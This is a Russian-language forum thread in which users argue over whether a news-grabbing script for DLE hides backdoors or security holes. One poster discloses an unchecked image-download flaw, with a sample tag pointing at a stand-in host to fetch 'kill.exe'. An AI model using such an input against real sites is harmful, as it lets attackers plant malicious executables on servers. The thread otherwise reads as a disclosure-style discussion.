Последняя версия NG

Статус
В этой теме нельзя размещать новые ответы.
мдя.. lite вариант rh57shell
 
а он случайно в базу не пишеццо?
а сам скрипт пассов не шлет никуда?
 
Там еще 7 уязвимых открытых мест, оставленных Первым разработчиком. Для того, что бы можно было грохнуть все одной командой.
 
Там еще 7 уязвимых открытых мест, оставленных Первым разработчиком. Для того, что бы можно было грохнуть все одной командой.

??? Ты серьезно?.. ну раз сказал А, то говори и Б.. где эти места, как их можно обезвредить?.. :)
 
??? Ты серьезно?.. ну раз сказал А, то говори и Б.. где эти места, как их можно обезвредить?.. :)

Ну ты сказал... Думаешь мне больше нечего делать, как обезвреживать чужие скрипты и латать чужие дыры?
В своей версии интеграции NG и DLE я все залатал, но отдельно NG в таком варианте работать не будет.
 
Ну ты сказал... Думаешь мне больше нечего делать, как обезвреживать чужие скрипты и латать чужие дыры?
В своей версии интеграции NG и DLE я все залатал, но отдельно NG в таком варианте работать не будет.

фантазируешь ты наверное.. что-то я не слышал ни одного случая, когда разработчик грохнул все одной коммандой.. хотя нуленых ньюсграбберов в десятки (если не в сотни) раз больше по сети гуляет, чем лицензионных..
..хоть бы где кто обмолвился, что у него по непонятной причине работать перестало.. или все файлы внезапно оказались стертыми.. да хотя бы даже на этом форуме..
..может и есть дырочки.. но по незнанию.. и сам афффтар об них не догадывается? :)
 
фантазируешь ты наверное..

походу и вправду... фантазер :))
просматривал я скрипты 100 раз... много чего было в них добавлено, че-то убрано... но вот откровенных "дыр" замечено небыло :nezn:

кстати, юзаю NG PRO v.1.0.060911
 
походу и вправду... фантазер :))
просматривал я скрипты 100 раз... много чего было в них добавлено, че-то убрано... но вот откровенных "дыр" замечено небыло :nezn:

кстати, юзаю NG PRO v.1.0.060911

Я рад, что Вы все такие грамотные, честно слово... :)

Теперь смотрим сюда и задаемся вопросом где в коде проверка на парсинг именно картинок? Парсер пасит строку <img scr=" вот все что тут он парсит". И если еще стоит сохранение картинок, то все что там будет указанно будет сохранено. <img scr="_http://xacker.com/kill.exe" и что вы думаете произойдет?

Больше ни на какие вопросы связанные с данной темой отвечать не буду. Все делается, все лечится.

Признаю свою вину. Виноват. Обхаял суперпарсер. Однозначно больше ничего не буду о нем писать.
Всем приношу извинения, кого затронул.
 
sergeus молодца.. один баг мы из тебя вытянули.. осталось еще шесть :D

.. так об чем это я?.. ах, да.. так вот.. нет там больш дыр.. одну дырочку ты нашел, а остальные придумал.. и можешь ничего не говорить.. все равно мы тебе не поверим.. :p
 
sergeus молодца.. один баг мы из тебя вытянули.. осталось еще шесть :D

.. так об чем это я?.. ах, да.. так вот.. нет там больш дыр.. одну дырочку ты нашел, а остальные придумал.. и можешь ничего не говорить.. все равно мы тебе не поверим.. :p

Вот и чудненько! А я, как и обещал больше ничего об этом писать не буду :)
Всем удачи и лёгкого парса.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху